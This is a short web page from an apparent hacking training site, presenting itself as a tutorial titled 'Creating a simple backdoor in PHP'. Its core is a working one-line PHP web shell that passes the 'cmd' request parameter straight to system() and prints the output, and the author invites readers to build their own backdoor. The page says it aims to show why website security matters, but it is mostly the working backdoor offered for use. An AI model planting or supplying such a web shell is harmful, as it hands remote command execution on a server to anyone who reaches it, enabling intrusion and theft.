ExtremeHacking
Today : | Time : | safemode : ON
> / Main Website / Cyber Surakha Abhiyan / Hackers Charity / Linkedin / facebook / twitter /
Name Author Perms Com Modified Label

Creating a simple backdoor in PHP Unknown rwxr-xr-x 0 7/15/2013

Filename Creating a simple backdoor in PHP
Permission rw-r--r--
Author Unknown
Date and Time 7/15/2013
Label
Action
Ethical Hacking Institute in Pune
./Arizona Team

























Many times in CEH and LPT classes I have repeated that website security should be taken ser
iously. While many dont do so. Here in this thread I will show you how easy it is to create a backdoor in PHP.

Go through the logical flow of the program and create your own PHP backdoor. If you have any problem in the logical flow you can shoot your query to me at instructor@arizonainfotech.com


Here is the PHP code:

<?php

if(isset($_REQUEST['cmd'])){echo "<pre>";     $cmd = ($_REQUEST['cmd']);        system($cmd);        echo "</pre>";        die;}

?>

www.arizonainfotech.com
CEH CHFI ECSA ENSA CCNA CCNA SECURITY MCITP RHCE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE
 

Cyber Suraksha Abhiyan | Sadik Shaikh © 2015 Sadik Shaikh | CEH V9 | ETHICAL HACKING Course Training Institute in India-Pune
Extreme Hacking Template design by Sadik Shaikh | Cyber Suraksha Abhiyan